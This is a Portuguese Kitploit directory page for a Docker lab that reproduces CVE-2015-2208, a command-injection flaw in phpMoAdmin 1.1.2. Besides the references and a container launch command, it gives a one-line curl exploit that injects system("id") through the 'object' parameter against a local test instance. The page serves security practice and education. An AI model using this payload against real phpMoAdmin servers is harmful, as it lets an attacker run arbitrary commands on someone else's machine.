Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2015-2208 — Docker simulating cve-2015-2208 vulnerability | Kitploit
Ferramentas/GitHubGitHub/ptantiku/cve-2015-2208
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubptantiku/cve-2015-2208

cve-2015-2208

Docker simulating cve-2015-2208 vulnerability

Ver Repositório
2há 11 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

#Dockerfile para simular ambiente para CVE-2015-2208#

A função saveObject em moadmin.php no phpMoAdmin 1.1.2 permite que atacantes remotos executem comandos arbitrários através de metacaracteres de shell no parâmetro object.

Descoberto por: @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio

Referências:

  • http://seclists.org/fulldisclosure/2015/Mar/19
  • http://www.exploit-db.com/exploits/36251/
  • https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2208

##Ambiente de teste##

root@kitploit:~
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208

##Exploit##

root@kitploit:~
curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'
Baixar ferramenta